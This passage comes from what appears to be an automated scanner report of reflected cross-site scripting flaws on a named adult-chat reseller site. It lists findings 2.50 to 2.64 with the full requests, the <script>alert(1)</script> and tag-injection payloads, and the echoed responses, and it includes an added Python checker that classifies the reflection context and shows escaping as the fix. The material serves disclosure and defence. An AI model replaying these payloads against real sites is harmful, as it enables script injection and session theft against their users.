GET /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%/4f469"><a>0a51b81895252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:38:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%/4f469"><a>0a51b81895252f/more2.html" style="color: ">
...[SNIP]...

2.50. http://www.resellerbase.com/adult/media-chat/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d0e14<script>alert(1)</script>1cfadc8a29a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/search.php?d0e14<script>alert(1)</script>1cfadc8a29a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/search.php?d0e14<script>alert(1)</script>1cfadc8a29a=1 was not found on this server.</p>
...[SNIP]...
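The findings above share two sinks: the request URI copied into a double-quoted href attribute (2.48, 2.49) and the request URI copied as text into the 404 page body (2.50). The script below is an added example, not part of the XSS.CX report or the resellerbase.com application. It re-implements the decision the scanner makes: locate the canary (random prefix, injected core, random suffix) in the response, determine whether it landed inside a quoted attribute or between tags, and grade an unmodified echo the way the report's Confidence column does (`<a>` surviving gives Firm, `<script>` surviving gives Certain). The page templates are constructed to mirror the two response snippets; the hardened variants assume an `html.escape` fix and are not the application's code.

```python
"""Context-aware reflection check for the echoed-URI findings (added example)."""
import html
import re

# --- constructed page templates, modelled on the report's response snippets ---

def render_link_unsafe(request_uri: str) -> str:
    # Raw request URI dropped into a double-quoted href with no output
    # encoding: the sink behind 2.48/2.49 (and 2.51, 2.53, 2.54).
    return ('<html><body>\n'
            f'<a href="{request_uri}/more2.html" style="color: ">more</a>\n'
            '</body></html>')

def render_link_safe(request_uri: str) -> str:
    # Assumed fix: attribute-context encoding; quote=True also escapes '"'.
    return ('<html><body>\n'
            f'<a href="{html.escape(request_uri, quote=True)}/more2.html" style="color: ">more</a>\n'
            '</body></html>')

def render_404_unsafe(request_uri: str) -> str:
    # The 404 handler echoes the requested URL as text between <p> tags:
    # the sink behind 2.50 (and 2.52, 2.55 onward).
    return ('<html><head><title>Error 404</title></head><body>\n'
            f'<p>The requested URL {request_uri} was not found on this server.</p>\n'
            '</body></html>')

def render_404_safe(request_uri: str) -> str:
    # Assumed fix: text-context encoding of the echoed URL.
    return ('<html><head><title>Error 404</title></head><body>\n'
            f'<p>The requested URL {html.escape(request_uri)} was not found on this server.</p>\n'
            '</body></html>')

# --- analysis ---------------------------------------------------------------

def context_at(body: str, pos: int) -> str:
    """Where does offset `pos` sit: 'attribute' (inside a double-quoted
    attribute value), 'tag' (inside a tag, outside quotes) or 'text'?"""
    before = body[:pos]
    last_lt, last_gt = before.rfind("<"), before.rfind(">")
    if last_lt > last_gt:
        # Inside a tag. An odd number of double quotes since the '<' means
        # the position is inside a quoted attribute value.
        return "attribute" if before[last_lt:].count('"') % 2 == 1 else "tag"
    return "text"

def classify(body: str, prefix: str, core: str, suffix: str) -> str:
    """Grade a reflection: 'script-injection' corresponds to the report's
    Confidence Certain, 'tag-injection' to Firm."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body, re.S)
    if not m:
        return "not-reflected"
    echoed = m.group(1)
    if echoed != core:
        # Reflected but altered: call it entity-encoded if no raw '<' survived.
        return "reflected-encoded" if "<" not in echoed else "reflected-modified"
    ctx = context_at(body, m.start())
    if ctx == "attribute" and not echoed.startswith('">'):
        # Unencoded, but the payload never closes the quoted value and the
        # tag, so the browser parses no new element.
        return "attribute-no-breakout"
    if "<script>" in echoed.lower():
        return "script-injection"
    if re.search(r"<[a-z][a-z0-9]*>", echoed, re.I):
        return "tag-injection"
    return "reflected-unmodified"

# --- the report's payload bodies replayed against the constructed templates --

CERTAIN_CORE = '"><script>alert(1)</script>'   # 2.48
FIRM_CORE = '"><a>'                              # 2.49
TEXT_CORE = "<script>alert(1)</script>"          # 2.50

def demo() -> dict:
    results = {}
    uri = f"/adult/media-chat/search.php?cat=17&Submit3=Search&/3cc05{CERTAIN_CORE}fe070232f8744b8a8opt=1"
    results["2.48 attribute, unencoded"] = classify(render_link_unsafe(uri), "3cc05", CERTAIN_CORE, "fe070232f8744b8a8")
    results["2.48 attribute, escaped"] = classify(render_link_safe(uri), "3cc05", CERTAIN_CORE, "fe070232f8744b8a8")
    uri = f"/adult/media-chat/search.php?cat=17&select=x%252f4f469{FIRM_CORE}0a51b81895"
    results["2.49 attribute, <a> only"] = classify(render_link_unsafe(uri), "4f469", FIRM_CORE, "0a51b81895")
    uri = f"/adult/media-chat/search.php?d0e14{TEXT_CORE}1cfadc8a29a=1"
    results["2.50 text, unencoded"] = classify(render_404_unsafe(uri), "d0e14", TEXT_CORE, "1cfadc8a29a")
    results["2.50 text, escaped"] = classify(render_404_safe(uri), "d0e14", TEXT_CORE, "1cfadc8a29a")
    return results

if __name__ == "__main__":
    for label, verdict in demo().items():
        print(f"{label:28} -> {verdict}")
```

Run as a script it prints one verdict per case; the two escaped cases come back as reflected-encoded because the same payload, passed through context-appropriate encoding (the PHP equivalent is htmlspecialchars() with ENT_QUOTES), can no longer close the attribute or open a tag. The random prefix and suffix matter: matching on them rather than on a bare `<script>` keeps the check from being fooled by script tags that are legitimately part of the page.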

2.51. http://www.resellerbase.com/adult/media-chat/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The value of the opt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 638de"><a>681ea33185c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that issues 2.48 and 2.53 show the same href attribute echoing an unencoded <script> tag for other parameters, so the lower confidence here most likely reflects the payload tried rather than any filtering of the opt value.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1638de"><a>681ea33185c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:34:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1638de"><a>681ea33185c/more2.html" style="color: ">
...[SNIP]...

2.52. http://www.resellerbase.com/adult/media-chat/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c7c96<a>e7bf0af9d5e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that issue 2.50 shows the same 404 page echoing an unencoded <script> tag from the request URL, so the lower confidence here most likely reflects the payload tried rather than any filtering.

Request

GET /adult/media-chat/search.php?keyword=search...&Submit3=Search&opt=2c7c96<a>e7bf0af9d5e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/search.php?keyword=search...&Submit3=Search&opt=2c7c96<a>e7bf0af9d5e was not found on this server.</p>
...[SNIP]...

2.53. http://www.resellerbase.com/adult/media-chat/search.php [select parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The value of the select request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26f56"><script>alert(1)</script>2512506b7c9 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f26f56"><script>alert(1)</script>2512506b7c9&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:35:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f26f56"><script>alert(1)</script>2512506b7c9&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f/more2.html" style="color: ">
...[SNIP]...

2.54. http://www.resellerbase.com/adult/media-chat/search.php [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The value of the select request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d9a"><a>9c7cf6b68b7 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that issue 2.53 confirms an unencoded <script> tag in the same href attribute via the same select parameter, so the lower confidence here reflects only the payload tried.

Request

GET /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f16d9a"><a>9c7cf6b68b7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:36:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f16d9a"><a>9c7cf6b68b7/more2.html" style="color: ">
...[SNIP]...

2.55. http://www.resellerbase.com/adult/media-chat/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 566c9<script>alert(1)</script>42fc5517d40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult566c9<script>alert(1)</script>42fc5517d40/media-chat/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult566c9<script>alert(1)</script>42fc5517d40/media-chat/themes/ was not found on this server.</p>
...[SNIP]...

2.56. http://www.resellerbase.com/adult/media-chat/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e8e33<script>alert(1)</script>57a288b3081 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chate8e33<script>alert(1)</script>57a288b3081/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chate8e33<script>alert(1)</script>57a288b3081/themes/ was not found on this server.</p>
...[SNIP]...

2.57. http://www.resellerbase.com/adult/media-chat/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 357bd<script>alert(1)</script>6979d0e8d97 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes357bd<script>alert(1)</script>6979d0e8d97/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes357bd<script>alert(1)</script>6979d0e8d97/ was not found on this server.</p>
...[SNIP]...

2.58. http://www.resellerbase.com/adult/media-chat/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e81aa<script>alert(1)</script>8e86b0b906c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/?e81aa<script>alert(1)</script>8e86b0b906c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:30:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/?e81aa<script>alert(1)</script>8e86b0b906c=1 was not found on this server.</p>
...[SNIP]...

2.59. http://www.resellerbase.com/adult/media-chat/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6605a<script>alert(1)</script>50884c6566d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult6605a<script>alert(1)</script>50884c6566d/media-chat/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult6605a<script>alert(1)</script>50884c6566d/media-chat/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.60. http://www.resellerbase.com/adult/media-chat/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73251<script>alert(1)</script>9a72b0e215b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat73251<script>alert(1)</script>9a72b0e215b/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat73251<script>alert(1)</script>9a72b0e215b/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.61. http://www.resellerbase.com/adult/media-chat/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dec27<script>alert(1)</script>2cd3898fb0a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themesdec27<script>alert(1)</script>2cd3898fb0a/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themesdec27<script>alert(1)</script>2cd3898fb0a/kosmos/ was not found on this server.</p>
...[SNIP]...

2.62. http://www.resellerbase.com/adult/media-chat/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ffbda<script>alert(1)</script>2d74f53a065 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmosffbda<script>alert(1)</script>2d74f53a065/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmosffbda<script>alert(1)</script>2d74f53a065/ was not found on this server.</p>
...[SNIP]...

2.63. http://www.resellerbase.com/adult/media-chat/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e66b4<script>alert(1)</script>e98e9db04eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/?e66b4<script>alert(1)</script>e98e9db04eb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/?e66b4<script>alert(1)</script>e98e9db04eb=1 was not found on this server.</p>
...[SNIP]...

2.64. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 69307<script>alert(1)</script>77f21c2224c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult69307<script>alert(1)</script>77f21c2224c/media-chat/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

